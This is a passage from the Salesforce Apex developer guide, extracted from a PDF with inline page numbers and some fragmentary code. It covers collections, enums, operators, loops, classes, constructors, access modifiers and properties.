array and isnt elastic, that is, you wont be allowed to add more elements than the declared array size.
All lists are initialized to null. Lists can be assigned values and allocated memory using literal notation. For example:
Example
List<Integer> ints = new Integer[0];
Description
Defines an Integer list of size zero with no elements
Defines an Integer list with memory allocated for six Integers
30
Lists
List Sorting
You can sort list elements and the sort order depends on the data type of the elements.
Using the List.sort method, you can sort elements in a list. Sorting is in ascending order for elements of primitive data types, such
as strings. The sort order of other more complex data types is described in the chapters covering those data types.
This example shows how to sort a list of strings and verifies that the colors are in ascending order in the list.
List<String> colors = new List<String>{
'Yellow',
'Red',
'Green'};
colors.sort();
System.assertEquals('Green', colors.get(0));
System.assertEquals('Red', colors.get(1));
System.assertEquals('Yellow', colors.get(2));
For the Visualforce SelectOption control, sorting is in ascending order based on the value and label fields. See this next section for the
sequence of comparison steps used for SelectOption.
This is the output of the debug statements. It shows the list contents before and after the sort.
DEBUG|Before sorting: (System.SelectOption[value="A", label="United States",
disabled="false"],
System.SelectOption[value="C", label="Canada", disabled="false"],
System.SelectOption[value="A", label="Mexico", disabled="false"])
DEBUG|After sorting: (System.SelectOption[value="A", label="Mexico", disabled="false"],
System.SelectOption[value="A", label="United States", disabled="false"],
System.SelectOption[value="C", label="Canada", disabled="false"])
31
Sets
Sets
A set is an unordered collection of elements that do not contain any duplicates. Set elements can be of any data typeprimitive types,
collections, sObjects, user-defined types, and built-in Apex types. For example, the following table represents a set of strings, that uses
city names:
'San Francisco'
'New York'
'Paris'
'Tokyo'
Sets can contain collections that can be nested within one another. For example, you can have a set of lists of sets of Integers. A set can
contain up to four levels of nested collections inside it, that is, up to five levels overall.
To declare a set, use the Set keyword followed by the primitive data type name within <> characters. For example:
new Set<String>()
To access elements in a set, use the system methods provided by Apex. For example:
Set<Integer> s = new Set<Integer>();
s.add(1);
System.assert(s.contains(1));
s.remove(1);
//
//
//
//
Define
Add an
Assert
Remove
a new set
element to the set
that the set contains an element
the element from the set
For more information, including a complete list of all supported set system methods, see Set Class on page 1675.
Note the following limitations on sets:
Unlike Java, Apex developers do not need to reference the algorithm that is used to implement a set in their declarations (for example,
HashSet or TreeSet). Apex uses a hash structure for all sets.
A set is an unordered collection. Do not rely on the order in which set results are returned. The order of objects returned by sets may
change without warning.
Maps
A map is a collection of key-value pairs where each unique key maps to a single value. Keys and values can be any data typeprimitive
types, collections, sObjects, user-defined types, and built-in Apex types. For example, the following table represents a map of countries
and currencies:
Country (Key)
'United States'
'Japan'
'France'
'England'
'India'
Currency (Value)
'Dollar'
'Yen'
'Euro'
'Pound'
'Rupee'
Map keys and values can contain any collection, and can contain nested collections. For example, you can have a map of Integers to
maps, which, in turn, map Strings to lists. Map keys can contain up to only four levels of nested collections.
32
Parameterized Typing
To declare a map, use the Map keyword followed by the data types of the key and the value within <> characters. For example:
Map<String, String> country_currencies = new Map<String, String>();
Map<ID, Set<String>> m = new Map<ID, Set<String>>();
You can use the generic or specific sObject data types with maps (youll learn more about maps with sObjects in a later chapter). You
can also create a generic instance of a map.
As with lists, you can populate map key-value pairs when the map is declared by using curly brace ({}) syntax. Within the curly braces,
specify the key first, then specify the value for that key using =>. For example:
Map<String, String> MyStrings = new Map<String, String>{'a' => 'b', 'c' =>
'd'.toUpperCase()};
In the first example, the value for the key a is b, and the value for the key c is d.
To access elements in a map, use the Map methods provided by Apex. This example creates a map of integer keys and string values. It
adds two entries, checks for the existence of the first key, retrieves the value for the second entry, and finally gets the set of all keys.
Map<Integer, String> m = new Map<Integer, String>(); // Define a new map
m.put(1, 'First entry');
// Insert a new key-value pair in the map
m.put(2, 'Second entry');
// Insert a new key-value pair in the map
System.assert(m.containsKey(1)); // Assert that the map contains a key
String value = m.get(2);
// Retrieve a value, given a particular key
System.assertEquals('Second entry', value);
Set<Integer> s = m.keySet();
// Return a set that contains all of the keys in the
map
For more information, including a complete list of all supported Map methods, see Map Class on page 1569.
Map Considerations
Unlike Java, Apex developers do not need to reference the algorithm that is used to implement a map in their declarations (for
example, HashMap or TreeMap). Apex uses a hash structure for all maps.
Do not rely on the order in which map results are returned. The order of objects returned by maps may change without warning.
Always access map elements by key.
A map key can hold the null value.
Adding a map entry with a key that matches an existing key in the map overwrites the existing entry with that key with the new
entry.
Map keys of type String are case-sensitive. Two keys that differ only by the case are considered unique and have corresponding
distinct Map entries. Subsequently, the Map methods, including put, get, containsKey, and remove treat these keys as
distinct.
Uniqueness of map keys of user-defined types is determined by the equals and hashCode methods, which you provide in
your classes. Uniqueness of keys of all other non-primitive types, such as sObject keys, is determined by comparing the objects field
values.
Parameterized Typing
Apex, in general, is a statically-typed programming language, which means users must specify the data type for a variable before that
variable can be used. For example, the following is legal in Apex:
Integer x = 1;
33
Enums
Lists, maps and sets are parameterized in Apex: they take any data type Apex supports for them as an argument. That data type must be
replaced with an actual data type upon construction of the list, map or set. For example:
List<String> myList = new List<String>();
Enums
An enum is an abstract data type with values that each take on exactly one of a finite set of identifiers that you specify. Enums are typically
used to define a set of possible values that dont otherwise have a numerical order, such as the suit of a card, or a particular season of
the year. Although each value corresponds to a distinct integer value, the enum hides this implementation so that you dont inadvertently
misuse the values, such as using them to perform arithmetic. After you create an enum, variables, method arguments, and return types
can be declared of that type.
Note: Unlike Java, the enum type itself has no constructor syntax.
To define an enum, use the enum keyword in your declaration and use curly braces to demarcate the list of possible values. For example,
the following code creates an enum called Season:
public enum Season {WINTER, SPRING, SUMMER, FALL}
By creating the enum Season, you have also created a new data type called Season. You can use this new data type as you might
any other data type. For example:
Season e = Season.WINTER;
Season m(Integer x, Season e) {
if (e == Season.SUMMER) return e;
//...
}
You can also define a class as an enum. Note that when you create an enum class you do not use the class keyword in the definition.
public enum MyEnumClass { X, Y }
You can use an enum in any place you can use another data type name. If you define a variable whose type is an enum, any object you
assign to it must be an instance of that enum class.
Any webService methods can use enum types as part of their signature. When this occurs, the associated WSDL file includes
definitions for the enum and its values, which can then be used by the API client.
Apex provides the following system-defined enums:
System.StatusCode
34
Variables
This enum corresponds to the API error code that is exposed in the WSDL document for all API operations. For example:
StatusCode.CANNOT_INSERT_UPDATE_ACTIVATE_ENTITY
StatusCode.INSUFFICIENT_ACCESS_ON_CROSS_REFERENCE_ENTITY
The full list of status codes is available in the WSDL file for your organization. For more information about accessing the WSDL file
for your organization, see Downloading Salesforce WSDLs and Client Authentication Certificates in the Salesforce online help.
System.XmlTag:
This enum returns a list of XML tags used for parsing the result XML from a webService method. For more information, see
XmlStreamReader Class.
System.ApplicationReadWriteMode: This enum indicates if an organization is in 5 Minute Upgrade read-only mode
during Salesforce upgrades and downtimes. For more information, see Using the System.ApplicationReadWriteMode
Enum.
System.LoggingLevel:
This enum is used with the system.debug method, to specify the log level for all debug calls. For more information, see System
Class.
System.RoundingMode:
This enum is used by methods that perform mathematical operations to specify the rounding behavior for the operation, such as
the Decimal divide method and the Double round method. For more information, see Rounding Mode.
System.SoapType:
This enum is returned by the field describe result getSoapType method. For more informations, see SOAPType Enum.
System.DisplayType:
This enum is returned by the field describe result getType method. For more information, see DisplayType Enum.
System.JSONToken:
This enum is used for parsing JSON content. For more information, see JSONToken Enum.
ApexPages.Severity:
This enum specifies the severity of a Visualforce message. For more information, see ApexPages.Severity Enum.
Dom.XmlNodeType:
This enum specifies the node type in a DOM document.
Note: System-defined enums cannot be used in Web service methods.
All enum values, including system enums, have common methods associated with them. For more information, see Enum Methods.
You cannot add user-defined methods to enum values.
Variables
Local variables are declared with Java-style syntax. For example:
Integer i = 0;
String str;
List<String> strList;
35
Variables
Set<String> s;
Map<ID, String> m;
As with Java, multiple variables can be declared and initialized in a single statement, using comma separation. For example:
Integer i, j, k;
Many instance methods on the data type will fail if the variable is null. In this example, the second statement generates an exception
(NullPointerException)
Date d;
d.addDays(2);
All variables are initialized to null if they arent assigned a value. For instance, in the following example, i, and k are assigned values,
while the integer variable j and the boolean variable b are set to null because they arent explicitly initialized.
Integer i = 0, j, k = 1;
Boolean b;
Note: A common pitfall is to assume that an uninitialized boolean variable is initialized to false by the system. This isnt the
case. Like all other variables, boolean variables are null if not assigned a value explicitly.
Variable Scope
Variables can be defined at any point in a block, and take on scope from that point forward. Sub-blocks cant redefine a variable name
that has already been used in a parent block, but parallel blocks can reuse a variable name. For example:
Integer i;
{
// Integer i;
}
Case Sensitivity
To avoid confusion with case-insensitive SOQL and SOSL queries, Apex is also case-insensitive. This means:
Variable and method names are case-insensitive. For example:
Integer I;
//Integer i;
36
Constants
Note: Youll learn more about sObjects, SOQL and SOSL later in this guide.
Also note that Apex uses the same filtering semantics as SOQL, which is the basis for comparisons in the SOAP API and the Salesforce
user interface. The use of these semantics can lead to some interesting behavior. For example, if an end-user generates a report based
on a filter for values that come before 'm' in the alphabet (that is, values < 'm'), null fields are returned in the result. The rationale for this
behavior is that users typically think of a field without a value as just a space character, rather than its actual null value. Consequently,
in Apex, the following expressions all evaluate to true:
String s;
System.assert('a' == 'A');
System.assert(s < 'b');
System.assert(!(s > 'b'));
Note: Although s < 'b' evaluates to true in the example above, 'b.'compareTo(s) generates an error because
youre trying to compare a letter to a null value.
Constants
Apex constants are variables whose values dont change after being initialized once.
Constants can be defined using the final keyword, which means that the variable can be assigned at most once, either in the
declaration itself, or with a static initializer method if the constant is defined in a class. This example declares two constants. The first is
initialized in the declaration statement. The second is assigned a value in a static block by calling a static method.
public class myCls {
static final Integer PRIVATE_INT_CONST = 200;
static final Integer PRIVATE_INT_CONST2;
public static Integer calculate() {
return 2 + 7;
}
static {
PRIVATE_INT_CONST2 = calculate();
}
}
For more information, see Using the final Keyword on page 74.
37
Understanding Expressions
Understanding Expressions
Understanding Expression Operators
Understanding Operator Precedence
Expanding sObject and List Expressions
Using Comments
Understanding Expressions
An expression is a construct made up of variables, operators, and method invocations that evaluates to a single value. In Apex, an
expression is always one of the following types:
A literal expression. For example:
1 + 1
Account(<field_initializers>)
Integer[<n>]
Account[]{<elements>}
List<Account>()
Set<String>{}
Map<String, Integer>()
myRenamingClass(string oldName, string newName)
Any value that can act as the left-hand of an assignment operator (L-values), including variables, one-dimensional list positions, and
most sObject or Apex object field references. For example:
Integer i
myList[3]
myContact.name
myRenamingClass.oldName
38
Syntax
Description
x = y
+=
x += y
*=
x *= y
-=
x -= y
/=
x /= y
|=
x |= y
&=
x &= y
<<=
x <<= y
Bitwise shift left assignment operator. Shifts each bit in x to the left by y bits
so that the high order bits are lost, and the new right bits are set to 0. This value is
then reassigned to x.
>>=
x >>= y
Bitwise shift right signed assignment operator. Shifts each bit in x to the right
by y bits so that the low order bits are lost, and the new left bits are set to 0 for
positive values of y and 1 for negative values of y. This value is then reassigned to
x.
39
Operator
Syntax
Description
>>>=
x >>>= y
Bitwise shift right unsigned assignment operator. Shifts each bit in x to the
right by y bits so that the low order bits are lost, and the new left bits are set to 0
for all values of y. This value is then reassigned to x.
? :
x ? y : z
&&
x && y
AND logical operator (Left associative). If x, a Boolean, and y, a Boolean, are both
true, then the expression evaluates to true. Otherwise the expression evaluates to
false.
Note:
&& has precedence over ||
This operator exhibits short-circuiting behavior, which means y is evaluated
only if x is true.
x and y cannot be null.
||
x || y
==
x == y
Equality operator. If the value of x equals the value of y, the expression evaluates
to true. Otherwise, the expression evaluates to false.
Note:
Unlike Java, == in Apex compares object value equality, not reference equality,
except for user-defined types. Consequently:
String comparison using == is case-insensitive
ID comparison using == is case-sensitive, and does not distinguish between
15-character and 18-character formats
User-defined types are compared by reference, which means that two
objects are equal only if they reference the same location in memory. You
can override this default comparison behavior by providing equals and
hashCode methods in your class to compare object values instead.
For sObjects and sObject arrays, == performs a deep check of all sObject field
values before returning its result. Likewise for collections and built-in Apex
objects.
For records, every field must have the same value for == to evaluate to true.
x or y can be the literal null.
40
Operator
Syntax
Description
The comparison of any two values can never result in null.
SOQL and SOSL use = for their equality operator, and not ==. Although Apex
and SOQL and SOSL are strongly linked, this unfortunate syntax discrepancy
exists because most modern languages use = for assignment and == for
equality. The designers of Apex deemed it more valuable to maintain this
paradigm than to force developers to learn a new assignment operator. The
result is that Apex developers must use == for equality tests in the main body
of the Apex code, and = for equality in SOQL and SOSL queries.
===
x === y
Exact equality operator. If x and y reference the exact same location in memory,
the expression evaluates to true. Otherwise, the expression evaluates to false.
<
x < y
Less than operator. If x is less than y, the expression evaluates to true. Otherwise,
the expression evaluates to false.
Note:
Unlike other database stored procedures, Apex does not support tri-state Boolean
logic, and the comparison of any two values can never result in null.
If x or y equal null and are Integers, Doubles, Dates, or Datetimes, the
expression is false.
A non-null String or ID value is always greater than a null value.
If x and y are IDs, they must reference the same type of object. Otherwise, a
runtime error results.
If x or y is an ID and the other value is a String, the String value is validated
and treated as an ID.
x and y cannot be Booleans.
The comparison of two strings is performed according to the locale of the
context user and is case-insensitive.
>
x > y
41
Operator
Syntax
Description
<=
x <= y
>=
x >= y
!=
x != y
Inequality operator. If the value of x does not equal the value of y, the expression
evaluates to true. Otherwise, the expression evaluates to false.
Note:
String comparison using != is case-insensitive
Unlike Java, != in Apex compares object value equality, not reference equality,
except for user-defined types.
For sObjects and sObject arrays, != performs a deep check of all sObject field
values before returning its result.
For records, != evaluates to true if the records have different values for any
field.
42
Operator
Syntax
Description
User-defined types are compared by reference, which means that two objects
are different only if they reference different locations in memory. You can
override this default comparison behavior by providing equals and
hashCode methods in your class to compare object values instead.
x or y can be the literal null.
The comparison of any two values can never result in null.
!==
x !== y
Exact inequality operator. If x and y do not reference the exact same location
in memory, the expression evaluates to true. Otherwise, the expression evaluates
to false.
x + y
x - y
x * y
x / y
!x
Logical complement operator. Inverts the value of a Boolean, so that true becomes
false, and false becomes true.
-x
43
Operator
Syntax
Description
++
x++
++x
--
x---x
&
x & y
Bitwise AND operator. ANDs each bit in x with the corresponding bit in y so
that the result bit is set to 1 if both of the bits are set to 1. This operator is not valid
for types Long or Integer.
x | y
Bitwise OR operator. ORs each bit in x with the corresponding bit in y so that
the result bit is set to 1 if at least one of the bits is set to 1. This operator is not valid
for types Long or Integer.
x ^ y
Bitwise exclusive OR operator. Exclusive ORs each bit in x with the corresponding
bit in y so that the result bit is set to 1 if exactly one of the bits is set to 1 and the
other bit is set to 0.
^=
x ^= y
Bitwise exclusive OR operator. Exclusive ORs each bit in x with the corresponding
bit in y so that the result bit is set to 1 if exactly one of the bits is set to 1 and the
other bit is set to 0. Assigns the result of the exclusive OR operation to x.
<<
x << y
Bitwise shift left operator. Shifts each bit in x to the left by y bits so that the
high order bits are lost, and the new right bits are set to 0.
>>
x >> y
Bitwise shift right signed operator. Shifts each bit in x to the right by y bits so
that the low order bits are lost, and the new left bits are set to 0 for positive values
of y and 1 for negative values of y.
>>>
x >>> y
Bitwise shift right unsigned operator. Shifts each bit in x to the right by y bits
so that the low order bits are lost, and the new left bits are set to 0 for all values of
y.
()
(x)
Operators
Description
{} () ++ --
! -x +x (type) new
* /
+ -
44
Using Comments
Precedence
Operators
Description
== !=
&&
Logical AND
||
Logical OR
= += -= *= /= &=
Assignment operators
Using Comments
Both single and multiline comments are supported in Apex code:
To create a single line comment, use //. All characters on the same line to the right of the // are ignored by the parser. For example:
Integer i = 1; // This comment is ignored by the parser
To create a multiline comment, use /* and */ to demarcate the beginning and end of the comment block. For example:
Integer i = 1; /* This comment can wrap over multiple
lines without getting interpreted by the
parser. */
Assignment Statements
An assignment statement is any statement that places a value into a variable, generally in one of the following two forms:
[LValue] = [new_value_expression];
[LValue] = [[inline_soql_query]];
In the forms above, [LValue] stands for any expression that can be placed on the left side of an assignment operator. These include:
A simple variable. For example:
Integer i = 1;
Account a = new Account();
Account[] accts = [SELECT Id FROM Account];
An sObject field reference that the context user has permission to edit. For example:
Account a = new Account(Name = 'Acme', BillingCity = 'San Francisco');
// IDs cannot be set prior to an insert call
// a.Id = '00300000003T2PGAA0';
// Instead, insert the record. The system automatically assigns it an ID.
insert a;
45
Similarly, two lists can point at the same value in memory. For example:
Account[] a = new Account[]{new Account()};
Account[] b = a;
a[0].Name = 'Acme';
System.assert(b[0].Name == 'Acme');
In addition to =, other valid assignment operators include +=, *=, /=, |=, &=, ++, and --. See Understanding Expression Operators
on page 39.
46
Note that the hierarchy and implicit conversion is unlike the Java hierarchy of numbers, where the base interface number is used and
implicit object conversion is never allowed.
In addition to numbers, other data types can be implicitly converted. The following rules apply:
IDs can always be assigned to Strings.
Strings can be assigned to IDs. However, at runtime, the value is checked to ensure that it is a legitimate ID. If it is not, a runtime
exception is thrown.
The instanceOf keyword can always be used to test whether a string is an ID.
47
CHAPTER 5
In this chapter ...
Conditional (If-Else)
Statements
Loops
48
The else portion is always optional, and always groups with the closest if. For example:
Integer x, sign;
// Your code
if (x <= 0) if (x == 0) sign = 0; else sign = -1;
is equivalent to:
Integer x, sign;
// Your code
if (x <= 0) {
if (x == 0) {
sign = 0;
} else {
sign = -1;
}
}
Loops
Apex supports the following five types of procedural loops:
do {statement} while (Boolean_condition);
while (Boolean_condition) statement;
for (initialization; Boolean_exit_condition; increment) statement;
for (variable : array_or_set) statement;
for (variable : [inline_soql_query]) statement;
All loops allow for loop control structures:
break; exits the entire loop
continue; skips to the next iteration of the loop
49
Do-While Loops
Do-While Loops
The Apex do-while loop repeatedly executes a block of code as long as a particular Boolean condition remains true. Its syntax is:
do {
code_block
} while (condition);
While Loops
The Apex while loop repeatedly executes a block of code as long as a particular Boolean condition remains true. Its syntax is:
while (condition) {
code_block
}
Note: Curly braces ({}) are required around a code_block only if the block contains more than one statement.
Unlike do-while, the while loop checks the Boolean condition statement before the first loop is executed. Consequently, it is
possible for the code block to never execute.
As an example, the following code outputs the numbers 1 - 10 into the debug log:
Integer count = 1;
while (count < 11) {
System.debug(count);
count++;
}
For Loops
Apex supports three variations of the for loop:
The traditional for loop:
for (init_stmt; exit_condition; increment_stmt) {
code_block
}
50
For Loops
code_block
}
code_block
}
or
for (variable_list : [soql_query]) {
code_block
}
Both variable and variable_list must be of the same sObject type as is returned by the soql_query.
Note: Curly braces ({}) are required around a code_block only if the block contains more than one statement.
Each is discussed further in the sections that follow.
code_block
}
When executing this type of for loop, the Apex runtime engine performs the following steps, in order:
1. Execute the init_stmt component of the loop. Note that multiple variables can be declared and/or initialized in this statement.
2. Perform the exit_condition check. If true, the loop continues. If false, the loop exits.
3. Execute the code_block.
4. Execute the increment_stmt statement.
5. Return to Step 2.
As an example, the following code outputs the numbers 1 - 10 into the debug log. Note that an additional initialization variable, j, is
included to demonstrate the syntax:
for (Integer i = 0, j = 0; i < 10; i++) {
System.debug(i+1);
}
51
For Loops
code_block
}
Iterating Collections
Collections can consist of lists, sets, or maps. Modifying a collection's elements while iterating through that collection is not supported
and causes an error. Do not directly add or remove elements while iterating through the collection that includes them.
52
CHAPTER 6
In this chapter ...
Understanding
Classes
Understanding
Interfaces
Keywords
Annotations
Differences Between
Apex Classes and
Java Classes
Class Definition
Creation
Namespace Prefix
53
Understanding Classes
Understanding Classes
As in Java, you can create classes in Apex. A class is a template or blueprint from which objects are created. An object is an instance of a
class. For example, the PurchaseOrder class describes an entire purchase order, and everything that you can do with a purchase
order. An instance of the PurchaseOrder class is a specific purchase order that you send or receive.
All objects have state and behavior, that is, things that an object knows about itself, and things that an object can do. The state of a
PurchaseOrder objectwhat it knowsincludes the user who sent it, the date and time it was created, and whether it was flagged as
important. The behavior of a PurchaseOrder objectwhat it can doincludes checking inventory, shipping a product, or notifying a
customer.
A class can contain variables and methods. Variables are used to specify the state of an object, such as the object's Name or Type.
Since these variables are associated with a class and are members of it, they are commonly referred to as member variables. Methods
are used to control behavior, such as getOtherQuotes or copyLineItems.
A class can contain other classes, exception types, and initialization code.
An interface is like a class in which none of the methods have been implementedthe method signatures are there, but the body of
each method is empty. To use an interface, another class must implement it by providing a body for all of the methods contained in the
interface.
For more general information on classes, objects, and interfaces, see http://java.sun.com/docs/books/tutorial/java/concepts/index.html
54
Class Variables
The private access modifier declares that this class is only known locally, that is, only by this section of code. This is the default
access for inner classesthat is, if you don't specify an access modifier for an inner class, it is considered private. This keyword
can only be used with inner classes.
The public access modifier declares that this class is visible in your application or namespace.
The global access modifier declares that this class is known by all Apex code everywhere. All classes that contain methods defined
with the webService keyword must be declared as global. If a method or inner class is declared as global, the outer,
top-level class must also be defined as global.
The with sharing and without sharing keywords specify the sharing mode for this class. For more information, see
Using the with sharing or without sharing Keywords on page 78.
The virtual definition modifier declares that this class allows extension and overrides. You cannot override a method with the
override keyword unless the class has been defined as virtual.
The abstract definition modifier declares that this class contains abstract methods, that is, methods that only have their signature
declared and no body defined.
Note:
You cannot add an abstract method to a global class after the class has been uploaded in a Managed - Released package
version.
If the class in the Managed - Released package is virtual, the method that you can add to it must also be virtual and must have
an implementation.
You cannot override a public or protected virtual method of a global class of an installed managed package.
For more information about managed packages, see What is a Package? on page 446.
A class can implement multiple interfaces, but only extend one existing class. This restriction means that Apex does not support multiple
inheritance. The interface names in the list are separated by commas. For more information about interfaces, see Understanding Interfaces
on page 71.
For more information about method and variable access modifiers, see Access Modifiers on page 59.
Class Variables
To declare a variable, specify the following:
Optional: Modifiers, such as public or final, as well as static.
Required: The data type of the variable, such as String or Boolean.
Required: The name of the variable.
Optional: The value of the variable.
Use the following syntax when defining a variable:
[public | private | protected | global | final] [static] data_type variable_name
[= value]
For example:
private static final Integer MY_INT;
private final Integer i = 1;
55
Class Methods
Class Methods
To define a method, specify the following:
Optional: Modifiers, such as public or protected.
Required: The data type of the value returned by the method, such as String or Integer. Use void if the method does not return a
value.
Required: A list of input parameters for the method, separated by commas, each preceded by its data type, and enclosed in parentheses
(). If there are no parameters, use a set of empty parentheses. A method can only have 32 input parameters.
Required: The body of the method, enclosed in braces {}. All the code for the method, including any local variable declarations, is
contained here.
Use the following syntax when defining a method:
(public | private | protected | global ) [override] [static] data_type method_name
(input parameters)
{
// The body of the method
}
Note: You can only use override to override methods in classes that have been defined as virtual.
For example:
public static Integer getInt() {
return MY_INT;
}
As in Java, methods that return values can also be run as a statement if their results are not assigned to another variable.
Note that user-defined methods:
Can be used anywhere that system methods are used.
Can be recursive.
Can have side effects, such as DML insert statements that initialize sObject record IDs. See Apex DML Statements on page 452.
Can refer to themselves or to methods defined later in the same class or anonymous block. Apex parses methods in two phases, so
forward declarations are not needed.
Can be polymorphic. For example, a method named foo can be implemented in two ways, one with a single Integer parameter
and one with two Integer parameters. Depending on whether the method is called with one or two Integers, the Apex parser selects
the appropriate implementation to execute. If the parser cannot find an exact match, it then seeks an approximate match using type
coercion rules. For more information on data conversion, see Understanding Rules of Conversion on page 46.
Note: If the parser finds multiple approximate matches, a parse-time exception is generated.
When using void methods that have side effects, user-defined methods are typically executed as stand-alone procedure statements
in Apex code. For example:
System.debug('Here is a note for the log.');
Can have statements where the return values are run as a statement if their results are not assigned to another variable. This is the
same as in Java.
56
Class Methods
57
Using Constructors
Using Constructors
A constructor is code that is invoked when an object is created from the class blueprint. You do not need to write a constructor for every
class. If a class does not have a user-defined constructor, an implicit, no-argument, public one is used.
The syntax for a constructor is similar to a method, but it differs from a method definition in that it never has an explicit return type and
it is not inherited by the object created from it.
After you write the constructor for a class, you must use the new keyword in order to instantiate an object from that class, using that
constructor. For example, using the following class:
public class TestObject {
// The no argument constructor
public TestObject() {
// more code here
}
}
A new object of this type can be instantiated with the following code:
TestObject myTest = new TestObject();
If you write a constructor that takes arguments, you can then use that constructor to create an object using those arguments. If you
create a constructor that takes arguments, and you still want to use a no-argument constructor, you must include one in your code.
Once you create a constructor for a class, you no longer have access to the default, no-argument public constructor. You must create
your own.
In Apex, a constructor can be overloaded, that is, there can be more than one constructor for a class, each having different parameters.
The following example illustrates a class with two constructors: one with no arguments and one that takes a simple Integer argument.
It also illustrates how one constructor calls another constructor using the this(...) syntax, also know as constructor chaining.
public class TestObject2 {
private static final Integer DEFAULT_SIZE = 10;
58
Access Modifiers
Integer size;
//Constructor with no arguments
public TestObject2() {
this(DEFAULT_SIZE); // Using this(...) calls the one argument constructor
}
// Constructor with one argument
public TestObject2(Integer ObjectSize) {
size = ObjectSize;
}
}
New objects of this type can be instantiated with the following code:
TestObject2 myObject1 = new TestObject2(42);
TestObject2 myObject2 = new TestObject2();
Every constructor that you create for a class must have a different argument list. In the following example, all of the constructors are
possible:
public class Leads {
// First a no-argument constructor
public Leads () {}
// A constructor with one argument
public Leads (Boolean call) {}
// A constructor with two arguments
public Leads (String email, Boolean call) {}
// Though this constructor has the same arguments as the
// one above, they are in a different order, so this is legal
public Leads (Boolean call, String email) {}
}
When you define a new class, you are defining a new data type. You can use class name in any place you can use other data type names,
such as String, Boolean, or Account. If you define a variable whose type is a class, any object you assign to it must be an instance of that
class or subclass.
Access Modifiers
Apex allows you to use the private, protected, public, and global access modifiers when defining methods and variables.
While triggers and anonymous blocks can also use these access modifiers, they are not as useful in smaller portions of Apex. For example,
declaring a method as global in an anonymous block does not enable you to call it from outside of that code.
For more information on class access modifiers, see Apex Class Definition on page 54.
Note: Interface methods have no access modifiers. They are always global. For more information, see Understanding Interfaces
on page 71.
59
By default, a method or variable is visible only to the Apex code within the defining class. You must explicitly specify a method or variable
as public in order for it to be available to other classes in the same application namespace (see Namespace Prefix). You can change the
level of visibility by using the following access modifiers:
private
This is the default, and means that the method or variable is accessible only within the Apex class in which it is defined. If you do
not specify an access modifier, the method or variable is private.
protected
This means that the method or variable is visible to any inner classes in the defining Apex class, and to the classes that extend the
defining Apex class. You can only use this access modifier for instance methods and member variables. Note that it is strictly more
permissive than the default (private) setting, just like Java.
public
This means the method or variable can be used by any Apex in this application or namespace.
Note: In Apex, the public access modifier is not the same as it is in Java. This was done to discourage joining applications,
to keep the code for each application separate. In Apex, if you want to make something public like it is in Java, you need to
use the global access modifier.
global
This means the method or variable can be used by any Apex code that has access to the class, not just the Apex code in the same
application. This access modifier should be used for any method that needs to be referenced outside of the application, either in
the SOAP API or by other Apex code. If you declare a method or variable as global, you must also declare the class that contains
it as global.
Note: We recommend using the global access modifier rarely, if at all. Cross-application dependencies are difficult to
maintain.
To use the private, protected, public, or global access modifiers, use the following syntax:
[(none)|private|protected|public|global] declaration
For example:
private string s1 = '1';
public string gets1() {
return this.s1;
}
60
The following is an example of a local variable whose scope is the duration of the if code block:
Boolean myCondition = true;
if (myCondition) {
integer localVariable = 10;
}
A trigger that uses this class could then selectively fail the first run of the trigger:
trigger t1 on Account (before delete, after delete, after undelete) {
if(Trigger.isBefore){
if(Trigger.isDelete){
if(p.firstRun){
Trigger.old[0].addError('Before Account Delete Error');
p.firstRun=false;
}
}
}
}
Static variables defined in a trigger dont retain their values between different trigger contexts within the same transaction, for example,
between before insert and after insert invocations. Define the static variables in a class instead so that the trigger can access these class
member variables and check their static values.
Class static variables cannot be accessed through an instance of that class. So if class C has a static variable S, and x is an instance of
C, then x.S is not a legal expression.
The same is true for instance methods: if M() is a static method then x.M() is not legal. Instead, your code should refer to those static
identifiers using the class: C.S and C.M().
If a local variable is named the same as the class name, these static methods and variables are hidden.
Inner classes behave like static Java inner classes, but do not require the static keyword. Inner classes can have instance member
variables like outer classes, but there is no implicit pointer to an instance of the outer class (using the this keyword).
61
Note: For Apex saved using Salesforce API version 20.0 or earlier, if an API call causes a trigger to fire, the chunk of 200 records to
process is further split into chunks of 100 records. For Apex saved using Salesforce API version 21.0 and later, no further splits of
API chunks occur. Note that static variable values are reset between API batches, but governor limits are not. Do not use static
variables to track state information between API batches.
62
Apex Properties
The instance initialization code in a class is executed every time an object is instantiated from that class. These code blocks run before
the constructor.
If you do not want to write your own constructor for a class, you can use an instance initialization code block to initialize instance variables.
However, most of the time you should either give the variable a default value or use the body of a constructor to do initialization and
not use instance initialization code.
Static initialization code is a block of code preceded with the keyword static:
static {
//code body
}
Similar to other static code, a static initialization code block is only initialized once on the first use of the class.
A class can have any number of either static or instance initialization code blocks. They can appear anywhere in the code body. The code
blocks are executed in the order in which they appear in the file, the same as in Java.
You can use static initialization code to initialize static final variables and to declare any information that is static, such as a map of values.
For example:
public class MyClass {
class RGB {
Integer red;
Integer green;
Integer blue;
RGB(Integer red, Integer green, Integer blue) {
this.red = red;
this.green = green;
this.blue = blue;
}
}
static Map<String, RGB> colorMap = new Map<String, RGB>();
static {
colorMap.put('red', new RGB(255, 0, 0));
colorMap.put('cyan', new RGB(0, 255, 255));
colorMap.put('magenta', new RGB(255, 0, 255));
}
}
Apex Properties
An Apex property is similar to a variable, however, you can do additional things in your code to a property value before it is accessed or
returned. Properties can be used in many different ways: they can validate data before a change is made; they can prompt an action
when data is changed, such as altering the value of other member variables; or they can expose data that is retrieved from some other
source, such as another class.
Property definitions include one or two code blocks, representing a get accessor and a set accessor:
The code in a get accessor executes when the property is read.
63
Apex Properties
The code in a set accessor executes when the property is assigned a new value.
A property with only a get accessor is considered read-only. A property with only a set accessor is considered write-only. A property with
both accessors is read-write.
To declare a property, use the following syntax in the body of a class:
Public class BasicClass {
// Property declaration
Where:
access_modifier is the access modifier for the property. The access modifiers that can be applied to properties include:
public, private, global, and protected. In addition, these definition modifiers can be applied: static and
transient. For more information on access modifiers, see Access Modifiers on page 59.
return_type is the type of the property, such as Integer, Double, sObject, and so on. For more information, see Data Types on
page 26.
property_name is the name of the property
For example, the following class defines a property named prop. The property is public. The property returns an integer data type.
public class BasicProperty {
public integer prop {
get { return prop; }
set { prop = value; }
}
}
The following code segment calls the class above, exercising the get and set accessors:
BasicProperty bp = new BasicProperty();
bp.prop = 5;
// Calls set accessor
System.assert(bp.prop == 5);
// Calls get accessor
64
Apex Properties
Apex properties are based on their counterparts in C#, with the following differences:
Properties provide storage for values directly. You do not need to create supporting members for storing values.
It is possible to create automatic properties in Apex. For more information, see Using Automatic Properties on page 65.
The following code segment calls the static and instance properties:
StaticProperty sp = new StaticProperty();
// The following produces a system error: a static variable cannot be
